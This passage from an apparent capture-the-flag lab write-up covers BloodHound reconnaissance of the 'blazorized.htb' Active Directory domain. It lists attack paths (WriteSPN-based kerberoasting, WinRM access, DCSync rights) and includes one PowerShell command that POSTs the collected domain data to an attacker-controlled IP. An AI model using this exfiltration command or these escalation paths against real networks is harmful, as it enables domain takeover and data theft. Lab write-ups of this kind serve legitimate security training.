BloodHound
BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.
Ingestion
Although there already is an existing PowerShell session open from the initial foothold, SharpHound has been executed as part of the adPEAS script
Since file transfer over SMB is not possible, I will use a simple Python script that support the POST method to transfer the ingested domain data file
This.
PS C:\tmp> iwr -Uri 'http://10.10.14.110:2222' -Method POST -InFile blazorized.htb_20240702081301_BloodHound.zipTransferred
Received
Prep
Ingested domain data uploaded
nu_1055
The nu_1055 account has WriteSPN privilege over the rsa_4810 account, essentially kerberoasting
This was also picked up by adPEAS earlier
rsa_4810
The rsa_4810 account is part of both Remote Management Users and Remote_Support_Administrators groups. The user is able to WinRM to the dc1.blazorized.htb host
ssa_6010
The ssa_6010 account has memberships to BUILTIN\Remote Management Users and BLAZORIZED\Super_Support_Administrators groups
The ssa_6010 account also has DCSync, GetChangeAll, GetChanges privileges from the membership to the Super_Support_Administrators group